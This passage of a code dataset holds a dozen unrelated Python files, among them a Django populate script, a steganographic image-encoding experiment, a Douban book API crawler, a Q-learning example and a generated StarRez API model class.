tokenizer.word_index.items():\r\n\t\tif index == integer:\r\n\t\t\treturn word\r\n\treturn None\r\n","sub_path":"Task-2/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"85290894","text":"\n\nclass Solution:\n # @param n, an integer\n # @return an integer\n def climbStairs(self, n):\n i = 0\n j = 1\n for x in range(n):\n i, j = j, i + j\n return j\n\n\n def climbStairs2(self, n):\n res = 0\n k = 0\n while 2 * k < n + 1:\n h = n - 2 * k\n res += combination(h + k, k)\n k += 1\n return res\n\n\ndef combination(n, k):\n if n == k or k == 0:\n return 1\n res = 1\n for i in range(1, k + 1):\n res *= n - i + 1\n res /= i\n return res\n","sub_path":"Python/Climbing Stairs.py","file_name":"Climbing Stairs.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15323424","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','NewProject.settings')\n\nimport django\ndjango.setup()\n\nfrom faker import Faker\nfakegen = Faker()\n\nfrom random import randint\n\nfrom NewApp.models import User, Exam\n\ndef populate(N=10):\n for entry in range(N):\n \n fake_username = fakegen.user_name()\n fake_email = fakegen.email()\n user, created = User.objects.get_or_create(username = fake_username, email = fake_email)\n\n random_score = randint(0,100)\n exam, created = Exam.objects.get_or_create(user = user, exam_score = random_score)\n\n\nif __name__ == '__main__': \n number = input(\"What number of user do you want? 
\")\n print('start populate {} user ..'.format(number))\n number = int(number)\n populate(number)\n print('population complete !')","sub_path":"Django Web-App/NewProject/populate_user.py","file_name":"populate_user.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"511268856","text":"import math\n\nn=int(input(\"Enter the lower bound : \"))\nm=int(input(\"Enter the upper bound : \"))\n\nnum_list=[]\n\nfor num in range(n,m+1):\n count=flag=0\n num=str(num)\n for i in num:\n \n count=count+1\n if int(i)%2!=0 :\n flag=1\n \n if count==4 and int(num)== (math.isqrt(int(num))**2) and flag==0:\n num_list.append(int(num))\n\nif len(num_list)==0:\n print(\"List is Empty!\")\nelse:\n print(\"Resultant list is :\",num_list)\n","sub_path":"LabCycle_2.1_4.py","file_name":"LabCycle_2.1_4.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"552676200","text":"import numpy as np \nimport torch\nimport matplotlib.pyplot as plt\nfrom imageio import imread, imwrite\nfrom torch import nn\nimport random\nimport sys\nimport argparse\nfrom PIL import Image\nfrom utils import calc_psnr, calc_ssim\nimport os\nimport time\n\nimport torch\nfrom torch.optim import LBFGS\nimport torch.nn.functional as F\n\nimport sys\nsys.path.append(\"..\")\n# from steganogan.decoders import DenseDecoderNLayers\nfrom steganogan.decoders import BasicDecoder, DenseDecoder\nfrom steganogan import SteganoGAN\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--name', type=str,\n help='file name')\nparser.add_argument('--dataset_path', type=str,\n help='path to dataset')\nparser.add_argument('--num_bits', type=int,\n help='number of bits to hide')\nparser.add_argument('--output_image_path', type=str,\n help='output image path')\nparser.add_argument('--pretrained', action=\"store_true\")\nparser.add_argument('--psnr_weight', type=float, default=0.5)\n\n\nargs = parser.parse_args()\nprint(args.name)\nexpname = \"main100_1\"\n\n\ndef flatten(image, dim=3):\n img = torch.cat(torch.split(image, 1, dim=1), dim=dim)\n return img\n\n\ndef shuffle_params(m):\n if type(m)==nn.Conv2d or type(m)==nn.BatchNorm2d:\n param = m.weight\n m.weight.data = nn.Parameter(torch.tensor(np.random.normal(0, 1, param.shape)).float())\n \n param = m.bias\n m.bias.data = nn.Parameter(torch.zeros(len(param.view(-1))).float().reshape(param.shape))\n\n\nclass normLayer(nn.Module):\n def __init__(self):\n super(normLayer, self).__init__()\n \n def forward(self, x):\n b,c,h,w = x.shape\n assert b == 1\n mean = x.view(c, -1).mean(-1)\n std = x.view(c, -1).std(-1)\n x = x - mean.reshape([1, c, 1, 1])\n x = x / (std + 1e-7).reshape([1,c,1,1])\n return x\n\n\nclass BasicDecoder(nn.Module):\n \"\"\"\n The BasicDecoder module takes an steganographic image and attempts to decode\n the embedded data tensor.\n\n Input: (N, 3, H, W)\n Output: (N, D, H, W)\n \"\"\"\n\n def _conv2d(self, in_channels, out_channels):\n return nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=3,\n padding=1\n )\n\n def _build_models(self):\n self.layers = nn.Sequential(\n self._conv2d(self.divstack * self.divstack * (1 if flatten_image else 3), self.hidden_size),\n nn.LeakyReLU(inplace=True),\n normLayer(),\n\n self._conv2d(self.hidden_size, self.hidden_size),\n nn.LeakyReLU(inplace=True),\n normLayer(),\n\n self._conv2d(self.hidden_size, self.hidden_size),\n 
nn.LeakyReLU(inplace=True),\n normLayer(),\n\n self._conv2d(self.hidden_size, self.data_depth * self.divstack * self.divstack // 3 if flatten_image else self.data_depth * self.divstack * self.divstack)\n )\n\n return [self.layers]\n\n def __init__(self, data_depth, hidden_size):\n super(BasicDecoder, self).__init__()\n self.data_depth = data_depth\n self.hidden_size = hidden_size\n self.divstack = 1\n\n self._models = self._build_models()\n\n def forward(self, x):\n x = self._models[0](x)\n\n if len(self._models) > 1:\n x_list = [x]\n for layer in self._models[1:]:\n x = layer(torch.cat(x_list, dim=1))\n x_list.append(x)\n\n return x\n\n\nhidden_size = 128\ncriterion = torch.nn.BCEWithLogitsLoss(reduction='sum')\n\n# models\npretrained = args.pretrained\nflatten_image = False\nsteps = 2000\nmax_iter = 20\nalpha = 0.1\neps = 0.105\npsnr_weight = args.psnr_weight\n\n\ndef psnr_loss(img1, img2):\n weight = torch.tensor([65.738, 129.057, 25.064]).view(1, 3, 1, 1) / 256.0\n diff = torch.sum((img1 - img2) * weight.to(img1.device), dim=1)\n return 10 * torch.log10(torch.norm(diff))\n\n\nfor seed in [11111,22222,33333,44444,55555,66666,777777,88888,99999,0]:\n if pretrained:\n steganogan = SteganoGAN.load(path=f\"demo_{args.num_bits}.1.steg\", cuda=True, verbose=True)\n model = steganogan.decoder\n else:\n print(\"Using basic decoder\")\n np.random.seed(seed)\n model = BasicDecoder(args.num_bits, hidden_size=hidden_size)\n model.apply(shuffle_params)\n model.to('cuda')\n # print(model)\n\n image = args.dataset_path + args.name\n image = imread(image, pilmode='RGB') / 255.0\n image = torch.FloatTensor(image).permute(2, 1, 0).unsqueeze(0)\n print(image.shape)\n image = image[:, :, :, :]\n image = image.to('cuda')\n if flatten_image:\n image = flatten(image, 3)\n num_pixels = image.shape[2] * image.shape[3]\n out = model(image)\n\n torch.manual_seed(int(args.name[:-4]))\n target = torch.bernoulli(torch.empty(out.shape).uniform_(0, 1)).to(out.device)\n print(target.shape)\n eps = eps - 0.0005\n print(\"eps:\", eps)\n adv_image = image.clone().detach()\n \n start = time.time()\n\n for i in range(steps // max_iter):\n adv_image.requires_grad = True\n optimizer = LBFGS([adv_image], lr=alpha, max_iter=max_iter)\n\n def closure():\n outputs = model(adv_image)\n loss = criterion(outputs, target)\n if psnr_weight > 0:\n pl = psnr_loss(adv_image, image) * num_pixels * psnr_weight\n # print(loss, pl)\n loss += pl\n\n optimizer.zero_grad()\n loss.backward()\n return loss\n\n optimizer.step(closure)\n delta = torch.clamp(adv_image - image, min=-eps, max=eps)\n adv_image = torch.clamp(image + delta, min=0, max=1).detach()\n\n acc = len(torch.nonzero((model(adv_image)>0).float().view(-1) != target.view(-1))) / target.numel()\n# print(i, acc)\n if acc == 0:\n break\n end = time.time()\n\n print(f\"used {end-start:0.3f} seconds.\")\n print(seed)\n psnr = calc_psnr((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (adv_image.squeeze().permute(2,1,0)*255).detach().cpu().numpy())\n print(\"psnr:\", psnr)\n print(\"ssim:\", calc_ssim((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (adv_image.squeeze().permute(2,1,0)*255).detach().cpu().numpy()))\n print(\"error:\", acc)\n lbfgsimg = (adv_image.cpu().squeeze().permute(2,1,0).numpy()*255).astype(np.uint8)\n if psnr > 20:\n break\n\nos.makedirs(args.output_image_path, exist_ok = True)\nimname = args.output_image_path+f'{args.num_bits}_{expname}_{args.name[:-4]}.png'\nImage.fromarray(lbfgsimg).save(imname)\n\nimage_read = imread(imname, 
pilmode='RGB') / 255.0\nimage_read = torch.FloatTensor(image_read).permute(2, 1, 0).unsqueeze(0).to('cuda')\nacc = len(torch.nonzero((model(image_read)>0).float().view(-1) != target.view(-1))) / target.numel()\nprint(\"read:\", acc)\npsnr = calc_psnr((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (image_read.squeeze().permute(2,1,0)*255).detach().cpu().numpy())\nssim = calc_ssim((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (image_read.squeeze().permute(2,1,0)*255).detach().cpu().numpy())\nprint(\"psnr\", psnr)\nprint(\"ssim\", ssim)\n\nwith open('final_exps_r.csv', mode='a') as file:\n file.write(f'{args.num_bits}, {expname}, {args.name}, {eps}, {seed}, {end - start}, {psnr}, {ssim}, {acc} \\n') \n\n\n\n\n\n","sub_path":"submission_code/scripts/rnns_results_xiangyu.py","file_name":"rnns_results_xiangyu.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"345418274","text":"import firebase_admin\nfrom firebase_admin import db\nfrom time import time\nimport random\nimport lorem\n\ncreds = firebase_admin.credentials.Certificate('./dev/admin-cert.json')\nkwargs = {'databaseURL': 'https://skinder-1.firebaseio.com'}\napp = firebase_admin.initialize_app(creds, kwargs)\n\nusers0 = db.reference('users').get()\nusers = {\n k: v for k, v in users0.items()\n if 'keep' in v and v['keep'] and 'pics' in v\n}\nusers = dict(list(users.items())[-10:])\nusers['0'] = users0['0']\n\ngetTime = lambda i, j: round(1000*(time()+i-3600*(j+1)))\n\nchats = {\n userID: {\n 'thumb': user['pics'][0]['link'],\n 'messages': [\n {\n 'txt': lorem.sentence(),\n 'fromUser': random.choice([True, False]),\n 'created': getTime(i, list(users).index(userID)),\n }\n for i in range(random.randint(3, 20))\n ]\n }\n for userID, user in users.items()\n}\n\ndb.reference('chats').set(chats)\n","sub_path":"dev/simulate_messages.py","file_name":"simulate_messages.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25782023","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport time\nimport requests\nimport string\nfrom drawing.util.log import setup_logger\nfrom drawing.models.tables.drawing import DrawingTable\nfrom drawing.models.model import DataBaseModel\nfrom sqlalchemy.orm import sessionmaker\n\nlogger = setup_logger(loggername=__name__, console=logging.DEBUG)\n\nDATABASE_MODEL = DataBaseModel()\nDATABASE_ENGINE = DATABASE_MODEL.db_connect()\n\n\nclass CrawlListGenerator(object):\n def _valid_isbn(self, isbn):\n return len(isbn) == 13 or len(isbn) == 10\n\n def _book_to_crawl(self, row):\n return self._valid_isbn(row.isbn) and (not row.tried_in_douban) and row.single_book\n\n def generate(self):\n db_session = sessionmaker(bind=DATABASE_ENGINE)\n return [row.isbn for row\n in db_session().query(DrawingTable.isbn, DrawingTable.tried_in_douban, DrawingTable.single_book).all()\n if self._book_to_crawl(row)]\n\n\nclass DrawingUpdater(object):\n def __init__(self, isbn, url, response):\n self._status_code = response.status_code\n self._content = response.json()\n self._page_url = url\n self._isbn = isbn\n\n def _handle_drawings(self, callback):\n session = sessionmaker(bind=DATABASE_ENGINE)()\n drawings = session.query(DrawingTable).filter(DrawingTable.isbn == self._isbn)\n for drawing in drawings:\n callback(drawing)\n if drawings.count() == 0:\n logger.warn('ISBN %s is not found in DB' % (self._isbn))\n 
session.commit()\n session.close()\n\n def _decode_response_content(self, drawing):\n self._mark_tried_in_douban(drawing)\n self._decode_basic_infor(drawing)\n self._decode_isbn(drawing)\n self._decode_rate(drawing)\n\n def _decode_basic_infor(self, drawing):\n if self._content.has_key('id'):\n drawing.douban_id = self._content['id']\n if self._content.has_key('title'):\n drawing.douban_title = self._content['title']\n if self._content.has_key('author_intro') and not drawing.author_intro:\n drawing.author_intro = self._content['author_intro']\n if self._content.has_key('summary') and not drawing.content_intro:\n drawing.content_intro = self._content['summary']\n\n def _decode_rate(self, drawing):\n if self._content.has_key(\"rating\"):\n rating = self._content['rating']\n if rating.has_key(\"numRaters\"):\n drawing.douban_raters = rating['numRaters']\n if rating.has_key(\"average\"):\n drawing.douban_rating_average = string.atof(rating['average']) * 10 # x/100\n\n def _decode_isbn(self, drawing):\n if self._content.has_key('isbn13'):\n drawing.isbn = self._content['isbn13']\n if self._content.has_key('isbn10'):\n drawing.isbn10 = self._content['isbn10']\n\n def _mark_tried_in_douban(self, drawing):\n drawing.tried_in_douban = True\n\n def _handle_success(self):\n self._handle_drawings(callback=self._decode_response_content)\n\n def _handle_404(self):\n logger.info('request to [%s] 404' % (self._page_url))\n self._handle_drawings(callback=self._mark_tried_in_douban)\n\n def _handle_failure(self):\n logger.info('request to [%s], status code is %d' % (self._page_url, self._status_code))\n\n def update(self):\n if self._status_code == requests.codes.ok:\n self._handle_success()\n elif self._status_code == 404:\n self._handle_404()\n else:\n self._handle_failure()\n\n\nclass SingleDrawingCrawler():\n def __init__(self, isbn):\n self._isbn = isbn\n self._page_url = r\"http://api.douban.com/v2/book/isbn/\" + isbn\n self._proxy = r\"10.144.1.10:8080\"\n\n def crawl(self):\n logger.info('crawling %s' % (self._page_url))\n if self._proxy:\n r = requests.get(self._page_url, proxies={'http': self._proxy})\n else:\n r = requests.get(self._page_url)\n DrawingUpdater(self._isbn, self._page_url, r).update()\n\n\ndef crawl_douban_api():\n for isbn in ['9787539174457', '7550243158']: # CrawlListGenerator().generate():\n SingleDrawingCrawler(isbn).crawl()\n time.sleep(10)\n\n\nif __name__ == '__main__':\n crawl_douban_api()\n","sub_path":"crawl_douban_api.py","file_name":"crawl_douban_api.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"504711383","text":"#求解方程和方程组\nfrom sympy import *\n\n# 求解 x*2 - 4 = 0 \n# solve:第一个参数为要解的方程,要求右端等于0,第二个参数为要解的未知数\nx = Symbol('x')\nprint(solve(x*2 -4,x))\n\n\n'''\n求解\n 2 * x - y = 3\n 3 * x + y = 7\n'''\n\nx,y = symbols('x y')\nresult = solve([2*x-y-3,3*x+y-7],[x,y])\nprint(result)\n\n","sub_path":"solve_function/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"444431648","text":"import itertools\nimport numpy as np\nimport windy_gridworld\nimport plotting\nfrom collections import defaultdict\n\nenv=windy_gridworld.WindyGridworldEnv()\ndef make_episilon_greedy_policy(Q,episilon,nA):\n def policy_fn(s):\n A=np.ones(nA,dtype=float)*episilon/nA\n best_action=np.argmax(Q[s])\n A[best_action]+=(1.0-episilon)\n return A\n return policy_fn\n\ndef 
Q_learning(env,num_episodes,discount_factor=1.0,alpha=0.5,epsilon=0.1):\n Q=defaultdict(lambda:np.zeros(env.action_space.n))\n \n stats=plotting.EpisodeStats(episode_lengths=np.zeros(num_episodes),\n episode_rewards=np.zeros(num_episodes))\n policy=make_episilon_greedy_policy(Q,epsilon,env.action_space.n)\n for i_episode in range(num_episodes):\n state=env.reset()\n \n for t in itertools.count():\n action_probs=policy(state)\n action = np.random.choice(np.arange(len(action_probs)), p=action_probs)\n next_state, reward, done, _ = env.step(action)\n stats.episode_rewards[i_episode] += reward\n stats.episode_lengths[i_episode] = t\n best_next_action=np.argmax(Q[next_state])\n td_target=reward+discount_factor*Q[next_state][best_next_action]\n td_delta=td_target-Q[state][action]\n Q[state][action]+=alpha*td_delta \n \n if done:\n break\n state=next_state\n return Q,stats\n \nQ, stats = Q_learning(env, 500) \nplotting.plot_episode_stats(stats) \n","sub_path":"script/Reinforcement/TD/SARSA.py","file_name":"SARSA.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"27416866","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nMain menu\ncalling external class and menu function\n\"\"\"\n\nfrom class_menu import Menu\n\nMENU = Menu()\nCHOICE = \"\"\n\n\ndef loadall():\n \"\"\" load all tables in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_all(CHOICE)\n\n\ndef selection():\n \"\"\" select foods for substitution \"\"\"\n MENU.clearscreen()\n MENU.selection(CHOICE)\n\n\ndef loadcategories():\n \"\"\" load categories in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_categories(CHOICE)\n\n\ndef loadcities():\n \"\"\" load cities in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_cities(CHOICE)\n\n\ndef loadbrands():\n \"\"\" load brands in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_brands(CHOICE)\n\n\ndef loadfoods():\n \"\"\" load all tables in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_foods(CHOICE)\n\n\ndef substitutemanage():\n \"\"\" item manage food substitute table \"\"\"\n MENU.clearscreen()\n MENU.substitute_manage(CHOICE)\n\n\ndef quit_programm():\n \"\"\" quit menu and program \"\"\"\n MENU.quit()\n\n\n# Main MENU\nwhile CHOICE != \"0\":\n MENU.clearscreen()\n MENU.main_menu()\n CHOICE = input(\"Make your choice : \")\n if CHOICE == \"q\":\n CHOICE = \"0\"\n MENU_VALUE = {0: quit_programm,\n 1: loadall,\n 2: loadcategories,\n 3: loadcities,\n 4: loadbrands,\n 5: loadfoods,\n 6: selection,\n 7: substitutemanage}\n if CHOICE is \"\":\n print('Bad choice')\n else:\n if CHOICE in \"01234567\":\n MENU_VALUE[int(CHOICE)]()\n else:\n print(\"Value must be between 0 et 7 or q, retry\")\n input(\"Press Enter to continue\")\n continue\n MENU.clearscreen()\n","sub_path":"openfoodfacts_menu.py","file_name":"openfoodfacts_menu.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217091935","text":"from model.contact import Contact\nfrom model.group import Group\nimport random\n\n\ndef test_add_contact_to_group(app, orm):\n if len(orm.get_contact_list()) == 0:\n app.contact.create(Contact(firstname=\"fsff\", middlename=\"fsf\", lastname=\"fsdf\", nickname=\"sdff\", title=\"dsfdsf\",\n company=\"fsfdfdf\",\n address=\"4242\", home=\"3424\", mobile=\"2344\", work=\"4234\",\n fax=\"43244\", email=\"434234\", email2=\"3424\", email3=\"4234\", homepage=\"423424\",\n byear=\"1199\",\n 
ayear=\"2423\", address2=\"324eeee\", phone2=\"324rew\",\n notes=\"324erwsd\"))\n if len(orm.get_group_list()) == 0:\n app.group.create(Group(name=\"new_name\", header=\"new_header\", footer=\"new_footer\"))\n old_contacts = orm.get_contact_list()\n groups = orm.get_group_list()\n contact = random.choice(old_contacts)\n group = random.choice(groups)\n if contact in orm.get_contacts_in_group(group):\n app.contact.delete_contact_from_group(contact.id, group.id)\n app.contact.add_contact_to_group(contact.id, group.id)\n assert contact in orm.get_contacts_in_group(group)\n assert contact not in orm.get_contacts_not_in_group(group)\n","sub_path":"test/test_add_contact_to_group.py","file_name":"test_add_contact_to_group.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399960126","text":"import math\nS, P = [int(x) for x in input().split()]\nedges = []\ntree = []\ninfo = []\nvertices = [[i] for i in range(P)]\nfor i in range(P):\n info.append([int(x) for x in input().split()])\nfor i in range(P):\n for j in range(P):\n if i == j:\n continue\n x1, y1 = info[i]\n x2, y2 = info[j]\n edges.append([math.sqrt((x1-x2)**2 + (y1-y2)**2), i, j])\nedges.sort()\nfor i in range(P-1):\n while True:\n edge = edges[0]\n start = edge[1]\n end = edge[2]\n m, n = [0, 0]\n for part in vertices:\n if start in part:\n m = part\n if end in part:\n n = part\n if m == n:\n edges.pop(0)\n continue\n tree.append(edge[0])\n ind1 = vertices.index(m)\n ind2 = vertices.index(n)\n vertices[ind1].extend(vertices[ind2])\n vertices.pop(ind2)\n edges.pop(0)\n break\nfor i in range(S-1):\n max_path = max(tree)\n tree.remove(max_path)\nres = max(tree)\nif res == int(res):\n print(str(int(res))+\".00\", end='')\nelse:\n print(round(res, 2), end='')","sub_path":"Code/CodeRecords/2431/61041/306272.py","file_name":"306272.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"269625796","text":"# coding: utf-8\n\n\"\"\"\n StarRez API\n\n This is a way to connect with the StarRez API. We are not the developers of the StarRez API, we are just an organization that uses it and wanted a better way to connect to it. 
# noqa: E501\n\n OpenAPI spec version: 1.0.0\n Contact: resdev@calpoly.edu\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass VMGroupMessageItem(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'vm_group_message_id': 'int',\n 'vm_group_id': 'int',\n 'vm_group_message_date': 'str',\n 'duration': 'int',\n 'filename': 'str',\n 'subject': 'str',\n 'sender_number': 'str',\n 'sender': 'str',\n 'priority': 'str',\n 'status': 'str',\n 'date_modified': 'str'\n }\n\n attribute_map = {\n 'vm_group_message_id': 'VMGroupMessageID',\n 'vm_group_id': 'VMGroupID',\n 'vm_group_message_date': 'VMGroupMessageDate',\n 'duration': 'Duration',\n 'filename': 'Filename',\n 'subject': 'Subject',\n 'sender_number': 'SenderNumber',\n 'sender': 'Sender',\n 'priority': 'Priority',\n 'status': 'Status',\n 'date_modified': 'DateModified'\n }\n\n def __init__(self, vm_group_message_id=None, vm_group_id=None, vm_group_message_date=None, duration=None, filename=None, subject=None, sender_number=None, sender=None, priority=None, status=None, date_modified=None): # noqa: E501\n \"\"\"VMGroupMessageItem - a model defined in Swagger\"\"\" # noqa: E501\n\n self._vm_group_message_id = None\n self._vm_group_id = None\n self._vm_group_message_date = None\n self._duration = None\n self._filename = None\n self._subject = None\n self._sender_number = None\n self._sender = None\n self._priority = None\n self._status = None\n self._date_modified = None\n self.discriminator = None\n\n if vm_group_message_id is not None:\n self.vm_group_message_id = vm_group_message_id\n if vm_group_id is not None:\n self.vm_group_id = vm_group_id\n if vm_group_message_date is not None:\n self.vm_group_message_date = vm_group_message_date\n if duration is not None:\n self.duration = duration\n if filename is not None:\n self.filename = filename\n if subject is not None:\n self.subject = subject\n if sender_number is not None:\n self.sender_number = sender_number\n if sender is not None:\n self.sender = sender\n if priority is not None:\n self.priority = priority\n if status is not None:\n self.status = status\n if date_modified is not None:\n self.date_modified = date_modified\n\n @property\n def vm_group_message_id(self):\n \"\"\"Gets the vm_group_message_id of this VMGroupMessageItem. # noqa: E501\n\n VM Group Message # noqa: E501\n\n :return: The vm_group_message_id of this VMGroupMessageItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._vm_group_message_id\n\n @vm_group_message_id.setter\n def vm_group_message_id(self, vm_group_message_id):\n \"\"\"Sets the vm_group_message_id of this VMGroupMessageItem.\n\n VM Group Message # noqa: E501\n\n :param vm_group_message_id: The vm_group_message_id of this VMGroupMessageItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._vm_group_message_id = vm_group_message_id\n\n @property\n def vm_group_id(self):\n \"\"\"Gets the vm_group_id of this VMGroupMessageItem. # noqa: E501\n\n VM Group # noqa: E501\n\n :return: The vm_group_id of this VMGroupMessageItem. 
# noqa: E501\n :rtype: int\n \"\"\"\n return self._vm_group_id\n\n @vm_group_id.setter\n def vm_group_id(self, vm_group_id):\n \"\"\"Sets the vm_group_id of this VMGroupMessageItem.\n\n VM Group # noqa: E501\n\n :param vm_group_id: The vm_group_id of this VMGroupMessageItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._vm_group_id = vm_group_id\n\n @property\n def vm_group_message_date(self):\n \"\"\"Gets the vm_group_message_date of this VMGroupMessageItem. # noqa: E501\n\n VM Group Message Date # noqa: E501\n\n :return: The vm_group_message_date of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._vm_group_message_date\n\n @vm_group_message_date.setter\n def vm_group_message_date(self, vm_group_message_date):\n \"\"\"Sets the vm_group_message_date of this VMGroupMessageItem.\n\n VM Group Message Date # noqa: E501\n\n :param vm_group_message_date: The vm_group_message_date of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._vm_group_message_date = vm_group_message_date\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this VMGroupMessageItem. # noqa: E501\n\n Duration # noqa: E501\n\n :return: The duration of this VMGroupMessageItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this VMGroupMessageItem.\n\n Duration # noqa: E501\n\n :param duration: The duration of this VMGroupMessageItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._duration = duration\n\n @property\n def filename(self):\n \"\"\"Gets the filename of this VMGroupMessageItem. # noqa: E501\n\n Filename # noqa: E501\n\n :return: The filename of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._filename\n\n @filename.setter\n def filename(self, filename):\n \"\"\"Sets the filename of this VMGroupMessageItem.\n\n Filename # noqa: E501\n\n :param filename: The filename of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n if filename is not None and len(filename) > 500:\n raise ValueError(\"Invalid value for `filename`, length must be less than or equal to `500`\") # noqa: E501\n\n self._filename = filename\n\n @property\n def subject(self):\n \"\"\"Gets the subject of this VMGroupMessageItem. # noqa: E501\n\n Subject # noqa: E501\n\n :return: The subject of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._subject\n\n @subject.setter\n def subject(self, subject):\n \"\"\"Sets the subject of this VMGroupMessageItem.\n\n Subject # noqa: E501\n\n :param subject: The subject of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n if subject is not None and len(subject) > 30:\n raise ValueError(\"Invalid value for `subject`, length must be less than or equal to `30`\") # noqa: E501\n\n self._subject = subject\n\n @property\n def sender_number(self):\n \"\"\"Gets the sender_number of this VMGroupMessageItem. # noqa: E501\n\n Sender Number # noqa: E501\n\n :return: The sender_number of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._sender_number\n\n @sender_number.setter\n def sender_number(self, sender_number):\n \"\"\"Sets the sender_number of this VMGroupMessageItem.\n\n Sender Number # noqa: E501\n\n :param sender_number: The sender_number of this VMGroupMessageItem. 
# noqa: E501\n :type: str\n \"\"\"\n if sender_number is not None and len(sender_number) > 30:\n raise ValueError(\"Invalid value for `sender_number`, length must be less than or equal to `30`\") # noqa: E501\n\n self._sender_number = sender_number\n\n @property\n def sender(self):\n \"\"\"Gets the sender of this VMGroupMessageItem. # noqa: E501\n\n Sender # noqa: E501\n\n :return: The sender of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._sender\n\n @sender.setter\n def sender(self, sender):\n \"\"\"Sets the sender of this VMGroupMessageItem.\n\n Sender # noqa: E501\n\n :param sender: The sender of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n if sender is not None and len(sender) > 30:\n raise ValueError(\"Invalid value for `sender`, length must be less than or equal to `30`\") # noqa: E501\n\n self._sender = sender\n\n @property\n def priority(self):\n \"\"\"Gets the priority of this VMGroupMessageItem. # noqa: E501\n\n Priority # noqa: E501\n\n :return: The priority of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._priority\n\n @priority.setter\n def priority(self, priority):\n \"\"\"Sets the priority of this VMGroupMessageItem.\n\n Priority # noqa: E501\n\n :param priority: The priority of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._priority = priority\n\n @property\n def status(self):\n \"\"\"Gets the status of this VMGroupMessageItem. # noqa: E501\n\n Status # noqa: E501\n\n :return: The status of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this VMGroupMessageItem.\n\n Status # noqa: E501\n\n :param status: The status of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._status = status\n\n @property\n def date_modified(self):\n \"\"\"Gets the date_modified of this VMGroupMessageItem. # noqa: E501\n\n Date Modified # noqa: E501\n\n :return: The date_modified of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._date_modified\n\n @date_modified.setter\n def date_modified(self, date_modified):\n \"\"\"Sets the date_modified of this VMGroupMessageItem.\n\n Date Modified # noqa: E501\n\n :param date_modified: The date_modified of this VMGroupMessageItem. 
